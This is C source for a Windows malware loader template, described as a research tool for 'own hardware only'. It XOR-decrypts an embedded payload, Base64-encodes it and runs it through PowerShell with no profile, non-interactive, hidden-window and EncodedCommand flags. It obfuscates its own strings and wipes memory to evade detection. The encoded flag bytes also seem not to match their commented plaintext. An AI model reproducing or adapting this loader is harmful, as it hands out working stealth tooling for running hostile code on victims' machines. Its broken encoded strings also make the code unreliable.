/*
 * ghost_loader_template.c — EncodedCommand PS1 Loader
 * 22DIV / george wu — CSEC research, own hardware only
 *
 * XOR-encrypted payload. Runtime:
 *   1. XOR decrypt in heap
 *   2. UTF-8 -> UTF-16LE (MultiByteToWideChar)
 *   3. Base64 (CryptBinaryToStringA)
 *   4. powershell -EncodedCommand <b64>
 * No stdin pipe. No encoding mismatch. Works regardless of system codepage.
 *
 * Generated by build_ghost_loader.py -- do not edit directly.
 * Link: cl.exe ... /link crypt32.lib
 */

#include <windows.h>
#include <wincrypt.h>

#define XOR_KEY /* XOR_KEY_VALUE */

static const unsigned char PAYLOAD_ENC[] = {
    /* PAYLOAD_BYTES */
    0x00
};
static const DWORD PAYLOAD_LEN = sizeof(PAYLOAD_ENC) - 1;

/* Wide-string append: dst must have enough space */
static WCHAR *wadd(WCHAR *dst, const WCHAR *src)
{
    while (*dst) dst++;
    while ((*dst++ = *src++));
    return dst - 1;
}

/* PS launcher -- pure Win32, no CRT */
static void make_ps_cmd(WCHAR *out, const WCHAR *b64)
{
    /* "powershell" XOR 0x01 */
    static const BYTE xps[] = {
        0x71,0x6e,0x76,0x64,0x72,0x73,0x67,0x64,0x6b,0x6b
    };
    WCHAR ps[16];
    DWORD j;
    for (j = 0; j < 10; j++) ps[j] = (WCHAR)(xps[j] ^ 0x01);
    ps[10] = 0;

    /* "-NoP -NonI -W Hidden -EncodedCommand" XOR 0x21 */
    static const BYTE xfl[] = {
        0x0c,0x4f,0x6f,0x5a,0x01,0x0c,0x4f,0x6f,0x4b,0x01,
        0x0c,0x56,0x01,0x49,0x4c,0x4c,0x4a,0x4e,0x4d,0x01,
        0x0c,0x42,0x4e,0x42,0x4f,0x4a,0x4b,0x41,0x42,0x4f,
        0x44,0x4d,0x4e,0x4e,0x4a,0x4e,0x43
    };
    WCHAR fl[48];
    for (j = 0; j < 37; j++) fl[j] = (WCHAR)(xfl[j] ^ 0x21);
    fl[37] = 0;

    /* Concat: ps + " " + fl + " " + b64 */
    static const WCHAR sp[] = { L' ', 0 };
    out[0] = 0;
    wadd(out, ps);
    wadd(out, sp);
    wadd(out, fl);
    wadd(out, sp);
    wadd(out, b64);
}

int WINAPI WinMain(HINSTANCE hI, HINSTANCE hP, LPSTR lpCmd, int nShow)
{
    /* 1. XOR decrypt payload to heap */
    unsigned char *raw = (unsigned char *)HeapAlloc(GetProcessHeap(), 0, PAYLOAD_LEN + 2);
    if (!raw) return 1;
    DWORD i;
    for (i = 0; i < PAYLOAD_LEN; i++)
        raw[i] = PAYLOAD_ENC[i] ^ (unsigned char)XOR_KEY;
    raw[PAYLOAD_LEN] = 0;

    /* 2. UTF-8 -> UTF-16LE */
    int wlen = MultiByteToWideChar(CP_UTF8, 0, (LPCSTR)raw, (int)PAYLOAD_LEN, NULL, 0);
    WCHAR *wscript = (WCHAR *)HeapAlloc(GetProcessHeap(), 0, (wlen + 1) * sizeof(WCHAR));
    if (!wscript) { ZeroMemory(raw, PAYLOAD_LEN); HeapFree(GetProcessHeap(), 0, raw); return 1; }
    MultiByteToWideChar(CP_UTF8, 0, (LPCSTR)raw, (int)PAYLOAD_LEN, wscript, wlen);
    wscript[wlen] = 0;
    ZeroMemory(raw, PAYLOAD_LEN);
    HeapFree(GetProcessHeap(), 0, raw);

    /* 3. Base64-encode the UTF-16LE bytes */
    DWORD b64len = 0;
    CryptBinaryToStringA((BYTE *)wscript, (DWORD)(wlen * sizeof(WCHAR)),
                         CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, NULL, &b64len);
    char *b64a = (char *)HeapAlloc(GetProcessHeap(), 0, b64len + 1);
    if (!b64a) { ZeroMemory(wscript, wlen * sizeof(WCHAR)); HeapFree(GetProcessHeap(), 0, wscript); return 1; }
    CryptBinaryToStringA((BYTE *)wscript, (DWORD)(wlen * sizeof(WCHAR)),
                         CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, b64a, &b64len);
    b64a[b64len] = 0;
    ZeroMemory(wscript, wlen * sizeof(WCHAR));
    HeapFree(GetProcessHeap(), 0, wscript);

    /* 4. ASCII b64 -> wide for command line */
    WCHAR *wb64 = (WCHAR *)HeapAlloc(GetProcessHeap(), 0, (b64len + 1) * sizeof(WCHAR));
    if (!wb64) { HeapFree(GetProcessHeap(), 0, b64a); return 1; }
    MultiByteToWideChar(CP_ACP, 0, b64a, -1, wb64, (int)(b64len + 1));
    ZeroMemory(b64a, b64len);
    HeapFree(GetProcessHeap(), 0, b64a);

    /* 5. Build full command string */
    DWORD cmdlen = b64len + 128;
    WCHAR *cmd = (WCHAR *)HeapAlloc(GetProcessHeap(), 0, cmdlen * sizeof(WCHAR));
    if (!cmd) { HeapFree(GetProcessHeap(), 0, wb64); return 1; }
    make_ps_cmd(cmd, wb64);
    ZeroMemory(wb64, b64len * sizeof(WCHAR));
    HeapFree(GetProcessHeap(), 0, wb64);

    /* 6. Launch -- no window, no pipe */
    STARTUPINFOW si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;

    BOOL launched = CreateProcessW(NULL, cmd, NULL, NULL, FALSE,
                                   CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
    ZeroMemory(cmd, cmdlen * sizeof(WCHAR));
    HeapFree(GetProcessHeap(), 0, cmd);

    if (launched) {
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
    return 0;
}
